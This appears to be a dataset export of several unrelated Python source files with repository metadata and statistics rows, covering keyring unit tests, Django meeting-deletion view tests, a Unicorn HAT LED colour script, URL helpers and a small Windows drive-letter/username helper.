response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
| 46.211538 | 128 | 0.672701 | 539 | 4,806 | 5.860853 | 0.148423 | 0.069642 | 0.072175 | 0.074074 | 0.860399 | 0.852168 | 0.825261 | 0.797404 | 0.779044 | 0.763533 | 0 | 0.007456 | 0.134831 | 4,806 | 103 | 129 | 46.660194 | 0.752285 | 0.01623 | 0 | 0.74359 | 0 | 0 | 0.276249 | 0.037468 | 0 | 0 | 0 | 0 | 0.25641 | 1 | 0.051282 | false | 0 | 0.012821 | 0 | 0.064103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b4410cca60d3849e5e6ff1af55ba8fd0dfda0bdc | 236 | py | Python | article/helpers.py | uktrade/directory-ui-export-readiness | 6a82178b866f6afb06a9e8d0f961989fa51195c6 | [
"MIT"
] | 1 | 2019-01-15T16:53:03.000Z | 2019-01-15T16:53:03.000Z | article/helpers.py | uktrade/directory-ui-export-readiness | 6a82178b866f6afb06a9e8d0f961989fa51195c6 | [
"MIT"
] | 537 | 2017-10-19T13:23:10.000Z | 2019-02-14T09:30:44.000Z | article/helpers.py | uktrade/directory-ui-export-readiness | 6a82178b866f6afb06a9e8d0f961989fa51195c6 | [
"MIT"
] | 3 | 2017-10-26T17:34:50.000Z | 2018-01-04T16:44:58.000Z |
def prefix_international_news_url(path):
return path.replace(
'/international/eu-exit-news/',
'/international/international-eu-exit-news/', 1)
def unslugify(slug):
return (slug.replace('-', ' ')).capitalize()
| 23.6 | 56 | 0.661017 | 26 | 236 | 5.884615 | 0.538462 | 0.196078 | 0.248366 | 0.300654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005102 | 0.169492 | 236 | 9 | 57 | 26.222222 | 0.77551 | 0 | 0 | 0 | 0 | 0 | 0.306383 | 0.297872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6f01056c3a8c4c964b5eeb601acdbf9ebddc2112 | 85 | py | Python | reinforcement/datasets/mr/__init__.py | hoxmark/Deep_reinforcement_active_learning | 7458916d6f75c7fbfcfd4bc81763ab5ba16208ad | [
"MIT"
] | 19 | 2018-03-19T12:08:18.000Z | 2021-08-14T09:12:33.000Z | reinforcement/datasets/mr/__init__.py | hoxmark/TDT4501-Specialization-Project | 7458916d6f75c7fbfcfd4bc81763ab5ba16208ad | [
"MIT"
] | 20 | 2020-01-28T22:14:40.000Z | 2022-03-11T23:17:48.000Z | reinforcement/datasets/mr/__init__.py | hoxmark/Deep_reinforcement_active_learning | 7458916d6f75c7fbfcfd4bc81763ab5ba16208ad | [
"MIT"
] | 6 | 2018-07-25T08:07:45.000Z | 2021-08-14T09:12:34.000Z | from datasets.mr.model import CNN as model
from datasets.mr.dataset import load_data
| 28.333333 | 42 | 0.835294 | 15 | 85 | 4.666667 | 0.666667 | 0.342857 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 85 | 2 | 43 | 42.5 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6f0b146e3d0b7205e941991d2ebea63fbc7665fe | 11,735 | py | Python | tests/unittest/test_keyring.py | andy-maier/easy-vault | cf9fd948ecabb3c1342ed8adb3a80d56e6d977d3 | [
"Apache-2.0"
] | 1 | 2021-03-29T22:10:04.000Z | 2021-03-29T22:10:04.000Z | tests/unittest/test_keyring.py | andy-maier/easy-vault | cf9fd948ecabb3c1342ed8adb3a80d56e6d977d3 | [
"Apache-2.0"
] | 61 | 2021-03-28T20:15:12.000Z | 2021-12-06T16:35:46.000Z | tests/unittest/test_keyring.py | andy-maier/easy-vault | cf9fd948ecabb3c1342ed8adb3a80d56e6d977d3 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the _keyring.py module.
"""
from __future__ import absolute_import, print_function
try:
from unittest import mock
except ImportError:
import mock
import pytest
import keyring
from easy_vault import Keyring, KeyringNotAvailable, KeyringError
from easy_vault._keyring import NO_KEYRING_EXCEPTION
# pylint: disable=unused-import
from ..utils.keyring_utils import keyring_filepath # noqa: F401
from ..utils.keyring_utils import is_keyring_available
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
# pylint: disable=redefined-outer-name
def test_keyring_get_set_delete(keyring_filepath):
"""
Test function for Keyring.get_password() / set_password() /
delete_password()
"""
kr = Keyring()
password = 'mypassword'
# Test that the password does not exist
act_password = kr.get_password(keyring_filepath)
assert act_password is None
# Test that the password does not exist
existed = kr.delete_password(keyring_filepath)
assert existed is False
# Test that setting a password succeeds
kr.set_password(keyring_filepath, password)
# Test that getting a password succeeds and is as expected
act_password = kr.get_password(keyring_filepath)
assert act_password == password
# Delete the password
existed = kr.delete_password(keyring_filepath)
assert existed is True
# Test that the password does not exist
existed = kr.delete_password(keyring_filepath)
assert existed is False
def test_keyring_available():
"""
Test function for Keyring.is_available()
"""
kr = Keyring()
# Code to be tested
is_avail = kr.is_available()
assert isinstance(is_avail, bool)
check_avail = True
try:
# Code to be tested
kr.check_available()
except Exception as exc: # pylint: disable=broad-except
assert isinstance(exc, KeyringNotAvailable)
check_avail = False
assert check_avail == is_avail
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_get_password_fail(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.get_password() when it raises an exception
"""
kr = Keyring()
with mock.patch.object(keyring, 'get_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.get_password(keyring_filepath)
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_set_password_fail(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.set_password() when it raises an exception
"""
kr = Keyring()
with mock.patch.object(keyring, 'set_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.set_password(keyring_filepath, 'dummy')
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_delete_password_fail1(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.delete_password() when it raises an exception
in keyring.get_password().
"""
kr = Keyring()
with mock.patch.object(keyring, 'get_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.delete_password(keyring_filepath)
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_delete_password_fail2(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.delete_password() when it raises an exception
in keyring.delete_password().
"""
kr = Keyring()
kr.set_password(keyring_filepath, 'dummy')
with mock.patch.object(keyring, 'delete_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.delete_password(keyring_filepath)
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_result",
[
(NO_KEYRING_EXCEPTION, False),
(keyring.errors.KeyringError, KeyringError),
]
)
def test_keyring_is_available_fail1(keyring_exc, exp_result):
"""
Test function for Keyring.is_available() when it raises an exception
in keyring.set_password().
"""
kr = Keyring()
with mock.patch.object(keyring, 'set_password', side_effect=keyring_exc):
if isinstance(exp_result, type) and issubclass(exp_result, Exception):
with pytest.raises(exp_result):
# Code to be tested
kr.is_available()
else:
# Code to be tested
available = kr.is_available()
assert available == exp_result
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc",
[
(NO_KEYRING_EXCEPTION),
(keyring.errors.KeyringError),
]
)
def test_keyring_is_available_fail2(keyring_exc):
"""
Test function for Keyring.is_available() when it raises an exception
in keyring.delete_password().
"""
kr = Keyring()
with mock.patch.object(
keyring, 'delete_password', side_effect=keyring_exc):
# Code to be tested
available = kr.is_available()
assert available is False
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
def test_keyring_is_available_fail3():
"""
Test function for Keyring.is_available() when the backend is the Chainer
backend with an empty list of backends.
"""
kr = Keyring()
backend_class = keyring.backends.chainer.ChainerBackend
with mock.patch.object(
keyring, 'get_keyring', return_value=backend_class()):
with mock.patch.object(
backend_class, 'backends',
new_callable=mock.PropertyMock) as backends_mock:
backends_mock.return_value = []
# Code to be tested
available = kr.is_available()
assert available is False
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
def test_keyring_is_available_fail4():
"""
Test function for Keyring.is_available() when the backend is the fail
backend.
"""
kr = Keyring()
backend_class = keyring.backends.fail.Keyring
with mock.patch.object(
keyring, 'get_keyring', return_value=backend_class()):
# Code to be tested
available = kr.is_available()
assert available is False
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
def test_keyring_is_available_fail5():
"""
Test function for Keyring.is_available() when the backend is the null
backend.
"""
kr = Keyring()
backend_class = keyring.backends.null.Keyring
with mock.patch.object(
keyring, 'get_keyring', return_value=backend_class()):
# Code to be tested
available = kr.is_available()
assert available is False
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
def test_keyring_check_available_fail1(keyring_exc, exp_exc):
"""
Test function for Keyring.check_available() when it raises an exception
in keyring.set_password().
"""
kr = Keyring()
with mock.patch.object(
keyring, 'set_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.check_available()
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc",
[
(NO_KEYRING_EXCEPTION),
(keyring.errors.KeyringError),
]
)
def test_keyring_check_available_fail2(keyring_exc):
"""
Test function for Keyring.check_available() when it raises an exception
in keyring.delete_password().
"""
kr = Keyring()
with mock.patch.object(
keyring, 'delete_password', side_effect=keyring_exc):
with pytest.raises(KeyringNotAvailable):
# Code to be tested
kr.check_available()
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
def test_keyring_check_available_fail3():
"""
Test function for Keyring.check_available() when the backend is the Chainer
backend with an empty list of backends.
"""
kr = Keyring()
backend_class = keyring.backends.chainer.ChainerBackend
with mock.patch.object(
keyring, 'get_keyring', return_value=backend_class()):
with mock.patch.object(
backend_class, 'backends',
new_callable=mock.PropertyMock) as backends_mock:
backends_mock.return_value = []
with pytest.raises(KeyringNotAvailable):
# Code to be tested
kr.check_available()
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
def test_keyring_check_available_fail4():
"""
Test function for Keyring.check_available() when the backend is the fail
backend.
"""
kr = Keyring()
backend_class = keyring.backends.fail.Keyring
with mock.patch.object(
keyring, 'get_keyring', return_value=backend_class()):
with pytest.raises(KeyringNotAvailable):
# Code to be tested
kr.check_available()
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
def test_keyring_check_available_fail5():
"""
Test function for Keyring.check_available() when the backend is the null
backend.
"""
kr = Keyring()
backend_class = keyring.backends.null.Keyring
with mock.patch.object(
keyring, 'get_keyring', return_value=backend_class()):
with pytest.raises(KeyringNotAvailable):
# Code to be tested
kr.check_available()
| 31.630728 | 80 | 0.686749 | 1,420 | 11,735 | 5.46831 | 0.111972 | 0.027817 | 0.017514 | 0.03065 | 0.832196 | 0.816227 | 0.791114 | 0.774887 | 0.766388 | 0.752994 | 0 | 0.002077 | 0.220452 | 11,735 | 370 | 81 | 31.716216 | 0.846742 | 0.233916 | 0 | 0.672727 | 0 | 0 | 0.089259 | 0 | 0 | 0 | 0 | 0 | 0.059091 | 1 | 0.072727 | false | 0.118182 | 0.045455 | 0 | 0.118182 | 0.004545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
6f2601abb37c93b876258d918821ab04fb574e8f | 673 | py | Python | Unicorn-Demonstration/colour.py | unixweb-team/IOT_demonstration | ce5b45e4f93091bee850adfb1b66ceb49b7f026b | [
"MIT"
] | 4 | 2017-11-24T15:24:19.000Z | 2021-01-29T11:23:08.000Z | Unicorn-Demonstration/colour.py | unixweb-team/IOT_demonstration | ce5b45e4f93091bee850adfb1b66ceb49b7f026b | [
"MIT"
] | null | null | null | Unicorn-Demonstration/colour.py | unixweb-team/IOT_demonstration | ce5b45e4f93091bee850adfb1b66ceb49b7f026b | [
"MIT"
] | null | null | null | def red():
import unicornhat as unicorn
import time
unicorn.set_layout(unicorn.AUTO)
unicorn.rotation(0)
unicorn.brightness(0.5)
width,height=unicorn.get_shape()
for y in range(height):
for x in range(width):
unicorn.set_pixel(x,y,255,10,25)
unicorn.show()
time.sleep(0.05)
def blue():
import unicornhat as unicorn
import time
unicorn.set_layout(unicorn.AUTO)
unicorn.rotation(0)
unicorn.brightness(0.5)
width,height=unicorn.get_shape()
for y in range(height):
for x in range(width):
unicorn.set_pixel(x,y,124,0,255)
unicorn.show()
time.sleep(0.05)
| 26.92 | 43 | 0.631501 | 98 | 673 | 4.27551 | 0.326531 | 0.095465 | 0.085919 | 0.119332 | 0.935561 | 0.935561 | 0.825776 | 0.825776 | 0.825776 | 0.825776 | 0 | 0.051485 | 0.249629 | 673 | 24 | 44 | 28.041667 | 0.778218 | 0 | 0 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
48bceafcd06f74fb86f689f47fda720eedf95726 | 12,951 | py | Python | BookClub/tests/views/meeting_views/test_delete_meeting_view.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | 4 | 2022-02-04T02:11:48.000Z | 2022-03-12T21:38:01.000Z | BookClub/tests/views/meeting_views/test_delete_meeting_view.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | 51 | 2022-02-01T18:56:23.000Z | 2022-03-31T15:35:37.000Z | BookClub/tests/views/meeting_views/test_delete_meeting_view.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | null | null | null | """Unit testing of the delete meeting view."""
from django.contrib import messages
from django.core.exceptions import ObjectDoesNotExist
from django.test import TestCase, tag
from django.urls import reverse
from BookClub.models import User, Club, ClubMembership, Meeting, Book
from BookClub.tests.helpers import LogInTester
@tag('views', 'meeting', 'delete_meeting')
class DeleteMeetingView(TestCase, LogInTester):
"""Tests for the Delete Meeting view."""
fixtures = [
"BookClub/tests/fixtures/default_users.json",
"BookClub/tests/fixtures/default_clubs.json",
"BookClub/tests/fixtures/default_books.json",
"BookClub/tests/fixtures/default_meetings.json",
]
def setUp(self):
self.organiser = User.objects.get(pk=1)
self.owner = User.objects.get(pk=2)
self.moderator = User.objects.get(pk=3)
self.member = User.objects.get(pk=4)
self.applicant = User.objects.get(pk=5)
self.book = Book.objects.get(pk=1)
self.meeting = Meeting.objects.get(pk=1)
self.club = Club.objects.get(pk=1)
self.url = reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name, 'meeting_id': self.meeting.id})
ClubMembership.objects.create(user=self.organiser, club=self.club,
membership=ClubMembership.UserRoles.MODERATOR)
ClubMembership.objects.create(user=self.owner, club=self.club, membership=ClubMembership.UserRoles.OWNER)
ClubMembership.objects.create(user=self.moderator, club=self.club,
membership=ClubMembership.UserRoles.MODERATOR)
ClubMembership.objects.create(user=self.member, club=self.club, membership=ClubMembership.UserRoles.MEMBER)
ClubMembership.objects.create(user=self.applicant, club=self.club,
membership=ClubMembership.UserRoles.APPLICANT)
def test_delete_meeting_url(self):
self.assertEqual(self.url, f'/club/{self.club.club_url_name}/meetings/{self.meeting.id}/delete/')
def test_get_delete_meeting_redirects_to_meeting_list(self):
"""Test for redirecting user to meeting list when used get method."""
self.client.login(username=self.owner.username, password='Password123')
self.assertTrue(self._is_logged_in())
response = self.client.get(self.url, {'user': self.owner.username})
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_delete_meeting_not_logged_in_redirect(self):
"""Test for a guest unsuccessfully trying to delete a meeting"""
self.assertFalse(self._is_logged_in())
response = self.client.post(self.url)
self.assertEqual(response.status_code, 302)
self.client.post(self.url)
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
"""Unit tests for user being able to delete a meeting"""
def test_owner_can_delete_meeting(self):
self.client.login(username=self.owner.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.SUCCESS)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_after, False)
def test_organiser_can_delete_meeting(self):
self.client.login(username=self.organiser.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.SUCCESS)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_after, False)
"""Unit tests for user not being able to delete a valid meeting"""
def test_moderator_cannot_delete_meeting(self):
self.client.login(username=self.moderator.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
def test_member_cannot_delete_meeting(self):
self.client.login(username=self.member.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
def test_applicant_cannot_delete_meeting(self):
self.client.login(username=self.applicant.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(reverse('club_dashboard', kwargs={'club_url_name': self.club.club_url_name}))
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=302)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
"""Unit tests for user not being able to delete an invalid meeting"""
def test_owner_delete_invalid_meeting(self):
self.client.login(username=self.owner.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_organiser_delete_invalid_meeting(self):
self.client.login(username=self.organiser.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_moderator_delete_invalid_meeting(self):
self.client.login(username=self.moderator.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_member_delete_invalid_meeting(self):
self.client.login(username=self.member.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_applicant_delete_invalid_meeting(self):
self.client.login(username=self.applicant.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(reverse('club_dashboard', kwargs={'club_url_name': self.club.club_url_name}))
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=302)
| 58.076233 | 120 | 0.693614 | 1,564 | 12,951 | 5.516624 | 0.076726 | 0.031641 | 0.049722 | 0.034771 | 0.866829 | 0.828813 | 0.811892 | 0.806096 | 0.806096 | 0.785814 | 0 | 0.016294 | 0.194425 | 12,951 | 222 | 121 | 58.337838 | 0.810697 | 0.015288 | 0 | 0.686486 | 0 | 0 | 0.081253 | 0.018898 | 0 | 0 | 0 | 0 | 0.308108 | 1 | 0.075676 | false | 0.059459 | 0.032432 | 0 | 0.118919 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
48d02fb8e534306964ff21108cc051fb3cd1e92d | 90 | py | Python | InstagramAPI/__init__.py | pauluskim/Quixotic_DATA | c360c21514193b3fbf4aa9572c90058e19403b1b | [
"MIT"
] | null | null | null | InstagramAPI/__init__.py | pauluskim/Quixotic_DATA | c360c21514193b3fbf4aa9572c90058e19403b1b | [
"MIT"
] | null | null | null | InstagramAPI/__init__.py | pauluskim/Quixotic_DATA | c360c21514193b3fbf4aa9572c90058e19403b1b | [
"MIT"
] | null | null | null | #from InstagramAPI.InstagramAPI import InstagramAPI
from InstagramAPI import InstagramAPI
| 30 | 51 | 0.888889 | 9 | 90 | 8.888889 | 0.333333 | 0.4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 90 | 2 | 52 | 45 | 0.97561 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d28a5cfdaa80abfb05b0abc6b4fa3461a021c7e0 | 182 | py | Python | python/dev/download/windows_info.py | Shail-Shouryya/automate_YouTube-Channel-Videos-List | b63bbebb7caacc5e99ebf5dc95387d505069953d | [
"Apache-2.0"
] | 26 | 2021-01-31T11:52:10.000Z | 2021-08-01T17:24:55.000Z | python/dev/download/windows_info.py | Shail-Shouryya/automate_YouTube-Channel-Videos-List | b63bbebb7caacc5e99ebf5dc95387d505069953d | [
"Apache-2.0"
] | 7 | 2020-06-01T13:14:15.000Z | 2021-01-09T20:58:17.000Z | python/dev/download/windows_info.py | Shail-Shouryya/automate_YouTube-Channel-Videos-List | b63bbebb7caacc5e99ebf5dc95387d505069953d | [
"Apache-2.0"
] | 6 | 2021-03-18T05:46:51.000Z | 2021-07-19T07:40:37.000Z | import subprocess
def get_drive_letter():
return subprocess.getoutput('echo %CD%').split(':')[0]
def get_user_name():
return subprocess.getoutput('whoami').split('\\')[1]
